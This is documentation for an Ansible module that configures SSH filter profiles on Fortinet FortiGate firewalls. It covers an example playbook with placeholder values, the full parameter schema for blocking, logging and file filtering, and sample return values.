Try SpotterConfigure SSH filter profile in Fortinet's FortiOS and FortiGate.
| "added in version" 2.0.0 of lix_fortinet.fortios"
Authors: Link Zheng (@chillancezen), Jie Xue (@JieX19), Hongbin Lu (@fgtdev-hblu), Frank Shen (@frankshen01), Miguel Angel Munoz (@mamunozgonzalez), Nicolas Thomas (@thomnico)
preview | supported by community
Install with ansible-galaxy collection install lix_fortinet.fortios:==102.2.120
collections:
- name: lix_fortinet.fortios
version: 102.2.120This module is able to configure a FortiGate or FortiOS (FOS) device by allowing the user to set and modify ssh_filter feature and profile category. Examples include all parameters and values need to be adjusted to datasources before usage. Tested with FOS v6.0.0
- hosts: fortigates
collections:
- fortinet.fortios
connection: httpapi
vars:
vdom: "root"
ansible_httpapi_use_ssl: yes
ansible_httpapi_validate_certs: no
ansible_httpapi_port: 443
tasks:
- name: Configure SSH filter profile.
fortios_ssh_filter_profile:
vdom: "{{ vdom }}"
state: "present"
access_token: "<your_own_value>"
ssh_filter_profile:
block: "x11"
default_command_log: "enable"
file_filter:
entries:
-
action: "log"
comment: "Comment."
direction: "incoming"
file_type:
-
name: "default_name_11 (source antivirus.filetype.name)"
filter: "<your_own_value>"
password_protected: "yes"
protocol: "ssh"
log: "enable"
scan_archive_contents: "enable"
status: "enable"
log: "x11"
name: "default_name_19"
shell_commands:
-
action: "block"
alert: "enable"
id: "23"
log: "enable"
pattern: "<your_own_value>"
severity: "low"
type: "simple"
vdom:
default: root
description:
- Virtual domain, among those defined previously. A vdom is a virtual instance of
the FortiGate that can be configured and used as a different unit.
type: str
state:
choices:
- present
- absent
description:
- Indicates whether to create or remove the object.
required: true
type: str
enable_log:
default: false
description:
- Enable/Disable logging for task.
required: false
type: bool
member_path:
description:
- Member attribute path to operate on.
- Delimited by a slash character if there are more than one attribute.
- Parameter marked with member_path is legitimate for doing member operation.
type: str
access_token:
description:
- Token-based authentication. Generated from GUI of Fortigate.
required: false
type: str
member_state:
choices:
- present
- absent
description:
- Add or delete a member under specified attribute path.
- When member_state is specified, the state option is ignored.
type: str
ssh_filter_profile:
default: null
description:
- Configure SSH filter profile.
suboptions:
block:
choices:
- x11
- shell
- exec
- port-forward
- tun-forward
- sftp
- scp
- unknown
description:
- SSH blocking options.
elements: str
type: list
default_command_log:
choices:
- enable
- disable
description:
- Enable/disable logging unmatched shell commands.
type: str
file_filter:
description:
- File filter.
suboptions:
entries:
description:
- File filter entries.
elements: dict
suboptions:
action:
choices:
- log
- block
description:
- Action taken for matched file.
type: str
comment:
description:
- Comment.
type: str
direction:
choices:
- incoming
- outgoing
- any
description:
- Match files transmitted in the session"s originating or reply direction.
type: str
file_type:
description:
- Select file type.
elements: dict
suboptions:
name:
description:
- File type name. Source antivirus.filetype.name.
type: str
type: list
filter:
description:
- Add a file filter.
type: str
password_protected:
choices:
- 'yes'
- any
description:
- Match password-protected files.
type: str
protocol:
choices:
- ssh
description:
- Protocols to apply with.
elements: str
type: list
type: list
log:
choices:
- enable
- disable
description:
- Enable/disable file filter logging.
type: str
scan_archive_contents:
choices:
- enable
- disable
description:
- Enable/disable file filter archive contents scan.
type: str
status:
choices:
- enable
- disable
description:
- Enable/disable file filter.
type: str
type: dict
log:
choices:
- x11
- shell
- exec
- port-forward
- tun-forward
- sftp
- scp
- unknown
description:
- SSH logging options.
elements: str
type: list
name:
description:
- SSH filter profile name.
required: true
type: str
shell_commands:
description:
- SSH command filter.
elements: dict
suboptions:
action:
choices:
- block
- allow
description:
- Action to take for SSH shell command matches.
type: str
alert:
choices:
- enable
- disable
description:
- Enable/disable alert.
type: str
id:
description:
- Id.
type: int
log:
choices:
- enable
- disable
description:
- Enable/disable logging.
type: str
pattern:
description:
- SSH shell command pattern.
type: str
severity:
choices:
- low
- medium
- high
- critical
description:
- Log severity.
type: str
type:
choices:
- simple
- regex
description:
- Matching type.
type: str
type: list
type: dict
build: description: Build number of the fortigate image returned: always sample: '1547' type: str http_method: description: Last method used to provision the content into FortiGate returned: always sample: PUT type: str http_status: description: Last result given by FortiGate on last operation applied returned: always sample: '200' type: str mkey: description: Master key (id) used in the last call to FortiGate returned: success sample: id type: str name: description: Name of the table used to fulfill the request returned: always sample: urlfilter type: str path: description: Path of the table used to fulfill the request returned: always sample: webfilter type: str revision: description: Internal revision number returned: always sample: 17.0.2.10658 type: str serial: description: Serial number of the unit returned: always sample: FGVMEVYYQT3AB5352 type: str status: description: Indication of the operation's result returned: always sample: success type: str vdom: description: Virtual domain used returned: always sample: root type: str version: description: Version of the FortiGate returned: always sample: v5.6.3 type: str